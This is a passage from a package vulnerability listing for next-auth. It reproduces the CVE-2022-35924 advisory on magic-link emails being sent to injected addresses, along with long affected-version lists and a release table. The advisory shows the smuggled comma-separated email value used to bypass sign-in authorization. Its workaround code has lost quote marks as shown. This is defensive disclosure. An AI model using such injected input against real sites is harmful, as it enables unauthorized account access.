"2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

NextAuth.js before 4.10.3 and 3.29.10 sending verification requests (magic link) to unwanted emails

Published date: 2022-08-02T18:00:33Z
CVE: CVE-2022-35924
Links:

Impact

next-auth users who are using the EmailProvider either in versions before 4.10.3 or 3.29.10 are affected.

If an attacker could forge a request that sent a comma-separated list of emails (eg.: attacker@attacker.com,victim@victim.com) to the sign-in endpoint, NextAuth.js would send emails to both the attacker and the victim's e-mail addresses. The attacker could then login as a newly created user with the email being attacker@attacker.com,victim@victim.com. This means that basic authorization like email.endsWith("@victim.com") in the signIn callback would fail to communicate a threat to the developer and would let the attacker bypass authorization, even with an @attacker.com address.

Patches

We patched this vulnerability in v4.10.3 and v3.29.10 by normalizing the email value that is sent to the sign-in endpoint before accessing it anywhere else. We also added a normalizeIdentifier callback on the EmailProvider configuration, where you can further tweak your requirements for what your system considers a valid e-mail address. (E.g.: strict RFC2821 compliance)

To upgrade, run one of the following: sh npm i next-auth@latest sh yarn add next-auth@latest sh pnpm add next-auth@latest

(This will update to the latest v4 version, but you can change latest to 3 if you want to stay on v3. This is not recommended. v3 is unmaintained.)

Workarounds

If for some reason you cannot upgrade, you can normalize the incoming request like the following, using Advanced Initialization: ```ts // pages/api/auth/[...nextauth].ts

function normalize(identifier) { // Get the first two elements only, // separated by @ from user input. let [local, domain] = identifier.toLowerCase().trim().split(@) // The part before @ can contain a , // but we remove it on the domain part domain = domain.split(,)[0] return ${local}@${domain} }

export default async function handler(req, res) { if (req.body.email) req.body.email = normalize(req.body.email) return await NextAuth(req, res, {/* your options */ }) } ```

References

For more information

If you have any concerns, we request responsible disclosure, outlined here: https://next-auth.js.org/security#reporting-a-vulnerability

Timeline

The issue was reported 26th of July, a response was sent out in less than 1 hour and after identifying the issue a patch was published within 5 working days.

Acknowledgments

We would like to thank Socket for disclosing this vulnerability in a responsible manner and following up until it got published.

Affected versions: ["3.29.9", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f", "4.10.2", "4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

721 Other Versions

Version License Security Released
5.0.0-beta.30 ISC 2025-10-27 - 23:13 5 months
5.0.0-beta.29 ISC 1 2025-06-22 - 12:16 9 months
5.0.0-beta.28 ISC 1 2025-05-10 - 05:43 11 months
5.0.0-beta.27 ISC 1 2025-04-24 - 16:20 11 months
5.0.0-beta.26 ISC 1 2025-04-20 - 06:41 11 months
5.0.0-beta.25 ISC 1 2024-10-19 - 20:36 over 1 year
5.0.0-beta.24 ISC 1 2024-10-19 - 20:16 over 1 year
5.0.0-beta.23 ISC 1 2024-10-18 - 17:06 over 1 year
5.0.0-beta.22 ISC 1 2024-09-27 - 18:59 over 1 year
5.0.0-beta.21 ISC 1 2024-09-15 - 20:34 over 1 year
5.0.0-beta.20 ISC 1 2024-07-28 - 03:13 over 1 year
5.0.0-beta.19 ISC 1 2024-06-02 - 06:13 almost 2 years
5.0.0-beta.18 ISC 1 2024-05-11 - 12:41 almost 2 years
5.0.0-beta.17 ISC 1 2024-04-25 - 16:08 almost 2 years
5.0.0-beta.16 ISC 1 2024-03-25 - 15:04 almost 2 years
5.0.0-beta.15 ISC 1 2024-03-02 - 15:04 about 2 years
5.0.0-beta.14 ISC 1 2024-03-02 - 15:02 about 2 years
5.0.0-beta.13 ISC 1 2024-02-20 - 14:22 about 2 years
5.0.0-beta.12 ISC 1 2024-02-19 - 13:01 about 2 years
5.0.0-beta.11 ISC 1 2024-02-14 - 14:36 about 2 years
5.0.0-beta.10 ISC 1 2024-02-14 - 14:03 about 2 years
5.0.0-beta.9 ISC 1 2024-02-08 - 00:21 about 2 years
5.0.0-beta.8 ISC 1 2024-02-06 - 01:46 about 2 years
